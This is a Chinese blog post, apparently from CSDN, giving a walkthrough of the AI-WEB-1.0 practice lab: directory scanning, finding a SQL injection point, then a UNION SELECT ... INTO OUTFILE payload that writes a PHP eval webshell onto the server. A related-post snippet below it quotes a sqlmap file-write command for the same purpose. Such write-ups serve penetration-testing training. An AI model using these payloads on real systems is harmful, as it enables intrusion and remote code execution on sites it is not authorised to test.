AI-WEB-1.0通关攻略

最新推荐文章于 2024-08-19 21:14:49 发布
最新推荐文章于 2024-08-19 21:14:49 发布
阅读量246 收藏
点赞数 8
文章标签: 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A2893992091/article/details/141330737
版权
1.使用御剑搜索位于与IP地址同一C段的靶机

2.扫描目标靶机目录下的文件

3.访问该文件

其中有两条提示的路径,分别访问,寻找注入点

m3diNf0

se3reTdir777/uploads/

se3reTdir777

4.在注入点尝试判断闭合方式
闭合方式:1

闭合方式:1'

闭合方式:1' # 

判断出闭合方式为:1'#

5.使用dirsearch查看各个目录的详细内容
se3reTdir777/uploads/

dirsearch -u http://172.16.59/se3reTdir777/uploads/

se3reTdir777

dirsearch -u http://172.16.59/se3reTdir777

 找到下级目录se3reTdir777/uploads/

m3diNf0

dirsearch -u http://172.16.59/m3diNf0

找到info.php文件

6.访问m3diNf0目录下的info.php文件

 找到靶场的绝对路径

/home/www/html/web1x443290o2sdf92213

7.使用into outfile上传一句话木马

在搜索框输入以下内容:

 1'union select 1,2,'<?php @eval($_POST[cmd]);?>' into outfile '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/sisw.php'#

 结果如下,上传成功

访问该文件,验证是否上传成功

8.使用联合注入查询,数据库名

1' union sekect 1, database() ,3 #

 结果如图所示:

通关!!!!

无敌的俊哥
关注
  • 8
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HCIP-AI-MindSpore Developer V1.0.zip
05-09
HCIP-AI-MindSpore Developer V1.0 版本说明 HCIP-AI-MindSpore Developer V1.0 实验手册 HCIP-AI-MindSpore Developer V1.0 学习文档 HCIP-AI-MindSpore Developer V1.0实验环境搭建及恢复指南
HCIP-AI-Ascend Developer V1.0视频.zip
04-16
1.2.1 昇腾AI处理器架构(1) 1.2 昇腾AI处理器架构 1.2.2 昇腾AI处理器架构(2) 1.2 昇腾AI处理器架构 1.3.1 openGauss技术指标 1.3 openGauss技术指标 1.3.1 昇腾AI计算平台CANN 1.3 昇腾AI计算平台CANN ...
靶机通关|AI-WEB-1.0 靶机通关攻略
a96482的博客
07-30 689
python3 sqlmap.py -r '/home/kali/桌面/2.txt' --file-write --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php。python3 sqlmap.py -r '/home/kali/桌面/2.txt'--batch -D aiweb1 -T systemUser --dump。中发现提交框,开始尝试注入。写入成功,使用蚁剑连接。连接成功,通关完成。
AI-Web-1.0通关攻略
最新发布
han14735828432的博客
08-19 59
用dirb扫描发现有robots.txt文件,我们发现robots.txt中有标明目录,我们再去尝试一一访问。输入1' or1=1 #,显示正常,存在注入。采取手工注入方式获得用户名和密码。尝试访问/se3reTdir777/目录,出现一个提交框。用dirsearch发现有php探针文件,我们访问它。用nmap扫ip的端口,发现只有80端口。找到绝对路径并写入一句话木马文件。写入成功后打开蚁剑。
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2535
AI-WEB-1.0靶机的简单攻略
Vulnhub靶机:AI-WEB-1.0
weixin_68416970的博客
05-22 1023
Vulnhub靶机:AI-WEB-1.0AI-WEB-1.0是一个专门设计用来测试渗透测试者技能的靶机。这个靶机的目标是从/root/flag.txt获取flag,获得低权限的shell,然后将权限提升到root。
HCIP-AI-Ascend Developer V1.0.zip
05-09
AI认证试题样例分析 HCIP-AI-Ascend Developer V1.0 版本说明 HCIP-AI-Ascend Developer V1.0 文档 HCIP-AI-Ascend Developer V1.0 学习资料 HCIP-AI-Ascend+Developer+V1.0+实验手册
HCIA-AI Solution V1.0 培训手册和实验手册.zip
05-13
《HCIA-AI Solution V1.0 培训手册和实验手册》是华为认证体系中针对人工智能领域的一份重要学习资源,旨在帮助学员掌握基础的人工智能理论知识与实践技能。这份压缩包包含了培训手册和实验手册两部分,旨在通过理论...
华为HCIP-AI-MindSpore Developer V1.0.rar
11-15
《华为HCIP-AI-MindSpore Developer V1.0》是华为针对人工智能领域推出的高级认证课程,旨在培养具备MindSpore深度学习框架开发能力的专业人才。MindSpore是华为自主研发的全场景AI计算框架,它支持从边缘计算到...
webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构
cybersnow精通 28 门计算机语言,凭借其超凡的技术能力,成功开发过上万个应用,广泛涉及政府、商业、个人等众多领域,甚至在检察院、环保局、公安局等专业场景中也大放异彩。不仅熟练掌握单片机和物联网开发,在软件架构设计方面更是独树一帜,自创了跨平台软件
08-15 258
【代码】webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构。
网上商品订单转手系统bootpf
weixin_43213064的博客
08-18 377
【代码】springboot网上商品订单转手系统bootpf
mysql介绍
weixin_57763462的博客
08-14 383
丰富的存储引擎:MySQL 提供了多种存储引擎,如 InnoDB、MyISAM、Memory 等,每种存储引擎都有其特定的应用场景和优势。多语言支持:MySQL 支持多种编程语言,包括 C、C++、Python、Java、Perl、PHP 等,并提供了相应的 API。安全性:MySQL 提供了灵活的权限和密码系统,支持基于主机的验证,并且所有的密码传输都采用加密形式,确保了数据的安全性。管理工具:MySQL 提供了丰富的管理工具,如命令行客户端、图形界面管理工具等,方便用户进行数据库的管理和维护。
旅游网站
weixin_43213064的博客
08-16 1026
【代码】springboot旅游网站
【Python使用】嘿马头条项目从到完整开发教程第1篇:简介,1. 内容【附代码文档】
一诺的博客
08-16 602
本教程的知识点为:简介 1. 内容 2. 目标 产品效果 ToutiaoWeb虚拟机使用说明 数据库 理解ORM 作用 思考: 使用ORM的方式选择 数据库 SQLAlchemy操作 1 新增 2 查询 all() 数据库 分布式ID 1 方案选择 2 头条 使用雪花算法 (代码 toutiao-backend/common/utils/snowflake) 数据库 Redis 1 Redis事务 基本事务指令 Python客户端操作 Git工用流 调试方法 JWT认证方案 JWT & JWS & JWE
健身房管理系统
寒夜
08-13 858
【代码】springboot健身房管理系统
MySQL系统变量innodb_autoinc_lock_mode
zxrhhm的博客
08-14 784
`innodb_autoinc_lock_mode` 是 MySQL InnoDB 存储引擎的一个系统变量,它控制着自增(AUTO_INCREMENT)值的锁定机制。
基于JAVA生产制造执行系统设计与实现(源码+论文+讲解等)
程序员阿龙的博客
08-13 1099
当下,如果 还依然使用纸质文档来记录并且管理相关信息,可能会出现很多问题,比如原始文件的丢失,因为采用纸质文档,很容易受潮或者怕火,不容易备份,需要花费大量的人员和资金来管理用纸质文档存储的信息,最重要的是数据出现问题寻找起来很麻烦,并且修改也困难,如果还这样操作会造成很大的资源浪费和经济损失。所以,对于本课题研究的产品生产制造信息的管理就需要有一款软件来代替手工操作,因此MES生产制造执行系统就应运而生。MES生产制造执行系统运用的工具包括Eclipse,Tomcat以及Navicat等。
企业架构MySQL读写分离
A1357924680_的博客
08-16 819
DAU : 2000 (每日活跃⽤户数) 之前业务中是单台 MySQL 提供服务,使用多台MySQL数据库务器,降低单台压力,实现集群架构的稳定性和高可用性 数据的一致性 完整性 replication通过业务比对和分析发现,随着活跃用户数增多,读取数据的请求变多,故着重解决读取数据的压力。基于主从复制的基础上,常见的数据库负载均衡使用的是读写分离方式。在业务代码中,数据库的操作,不直接连接数据库,而是先请求到中间件服务器(代理)由代理服务器,判断是读操作去从数据服务器,写操作去主数据服务器。
hcia-intelligent computing v1.0 实验手册
01-17
hcia-intelligent computing v1.0 实验手册是华为公司针对人工智能计算领域的培训教材。该手册主要包括人工智能基础知识、数据处理、模型训练与部署等内容,旨在帮助学习者了解人工智能的基本概念和技术,并掌握相关实验操作与应用技能。 实验手册首先介绍了人工智能的基本概念和发展历程,阐述了人工智能在各个领域的应用现状和未来趋势。然后对数据处理技术进行了详细的讲解,包括数据采集、清洗、特征提取等操作,培养学习者对数据分析的能力。接着介绍了常用的机器学习算法和深度学习框架,包括神经网络搭建、模型训练与调优等内容,帮助学习者掌握模型设计与优化的方法。最后,实验手册还包括了模型部署与应用的操作指南,帮助学习者将所学知识应用到实际场景中。 在实验手册中,华为公司提供了丰富的案例分析和实例操作,通过实际的数据处理和模型训练实验,帮助学习者深入理解人工智能技术的应用和意义。同时,实验手册还提供了丰富的练习题和实验报告模板,帮助学习者系统地总结所学知识,提升自己的实践能力。 总之,hcia-intelligent computing v1.0 实验手册是一份全面系统的人工智能培训教材,对于想要深入学习人工智能计算领域的读者来说,是一份非常有价值的参考资料。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值